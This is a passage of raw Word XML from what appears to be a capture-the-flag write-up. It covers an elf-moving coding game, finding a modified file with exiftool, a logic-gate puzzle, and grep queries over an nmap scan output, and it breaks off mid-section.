    <w:p w14:paraId="47E995B8" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67CF9ECB" w14:textId="5A24915D" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import elf, munchkins, levers, lollipops, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yeeters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, pits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230BC24A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for num in range(2): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152963FB" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveLeft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FED5884" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F69B2F7" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveLeft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1503A70B" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveDown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C0778" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveLeft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C276274" w14:textId="67219420" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3C7921" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF8F080" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Level 8 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2765A975" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022F6214" w14:textId="40FF90E0" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import elf, munchkins, levers, lollipops, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yeeters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, pits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED24B3E" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>all_lollipops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lollipops.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149D694A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lever0 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>levers.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DCE551" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for lollipop in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>all_lollipops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36563F6D" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveTo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lollipop.position</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CBFAC3" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveTo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(lever0.position)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5FCD3B" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever0.pull(["munchkins rule"] + lever0.data())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F51015C" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveDown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AE17B6" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveLeft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B8B042" w14:textId="09C51DF9" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B9B9E" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3FE804" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Exif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B4ADF4" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">A file has been modified by Jack Frost. Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to review file metadata, determine which file was modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8254F0" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>The command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeIndentedChar"/>
        </w:rPr>
        <w:t>exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeIndentedChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” will display all metadata for all files. I used this since I wasn’t completely sure what kind of metadata we would be looking for information in. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0201593A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">I manually reviewed the metadata for anomalies and found </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>2021-12-21.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a modified date that did not match other files or its creation date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C8B80D" w14:textId="330AEEC3" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>To only extract the modified dates for an easier digestible comparison, run “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> * -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>ModifyDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00342C83">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E68F9" w14:textId="402DFC24" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>Submit “</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>2021-12-21.docx</w:t>
      </w:r>
      <w:r>
        <w:t>” in the top panel to solve the challenge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F998273" w14:textId="77777777" w:rsidR="005D16A1" w:rsidRDefault="005D16A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F4569" w14:textId="71B53404" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Frostavator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0786A603" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">To solve this challenge, you have to reorder the six logic gates to ensure that all outputs are on. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539B84E6" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>The following solution will allow the elevator to operate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10465428" w14:textId="274DED98" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19C716A3" wp14:editId="05BC36AC">
            <wp:extent cx="5010150" cy="5667375"/>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rotWithShape="1">
                    <a:blip r:embed="rId34">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2527" r="2527" b="2138"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5010150" cy="5667375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75174BE2" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="75D625CF" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Grepping for Gold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33756159" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">In this challenge, we need to find answers to several questions out of a very large </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39246395" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>The questions, associated syntax/process, and answers are below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79818CA6" w14:textId="77777777" w:rsidR="00342C83" w:rsidRPr="00D6316D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="00D6316D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">What port does 34.76.1.22 have open? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440D1336" w14:textId="4D9573A0" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 62078</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A6CE6A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">elf@6e5595dc136e:~$ grep 34.76.1.22 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bigscan.gnmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E49A381" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Host: 34.76.1.22 ()     Status: Up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A127463" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Host: 34.76.1.22 ()     Ports: 62078/open/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iphone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-sync///      Ignored State: closed (999)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3107E2B7" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="7725CDA1" w14:textId="77777777" w:rsidR="00342C83" w:rsidRPr="00D6316D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6316D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What port does 34.77.207.226 have open? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16915DED" w14:textId="4E6E43A4" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CCFF99" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">elf@6e5595dc136e:~$ grep 34.77.207.226 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bigscan.gnmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10767AC2" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Host: 34.77.207.226 ()     Status: Up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5026B7" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Host: 34.77.207.226 ()     Ports: 8080/open/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>//http-proxy///      Ignored State: filtered (999)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EA03D7" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="2C19BC12" w14:textId="77777777" w:rsidR="00342C83" w:rsidRPr="00D6316D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6316D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">How many hosts appear "Up" in the scan? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A1FBEA" w14:textId="61E1BCED" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 26054</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4A0B4F" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">elf@6e5595dc136e:~$ grep "Status: Up" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bigscan.gnmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A0C497" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>26054</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD342BE" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="0094724D"/>
    <w:p w14:paraId="5A30B8BF" w14:textId="77777777" w:rsidR="00342C83" w:rsidRPr="00D6316D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6316D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">How many hosts have a web port open? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A2CE77" w14:textId="1A2C50DB" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14372</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD77D94" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lf@6e5595dc136e:~$ grep '80/open/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>//http\|443/open/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">//https\|8080/open/tch//http' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bigscan.gnmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F96226" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>14372</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE05623" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="0094724D"/>
    <w:p w14:paraId="11CC4CEA" w14:textId="77777777" w:rsidR="00342C83" w:rsidRPr="00D6316D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6316D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">How many hosts with status Up have no (detected) open TCP ports? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E36F4F0" w14:textId="1C555C8D" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 402</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5F90AD" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">elf@6e5595dc136e:~$ grep Ports </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bigscan.gnmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663E0F7E" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>25652</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E53C06" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
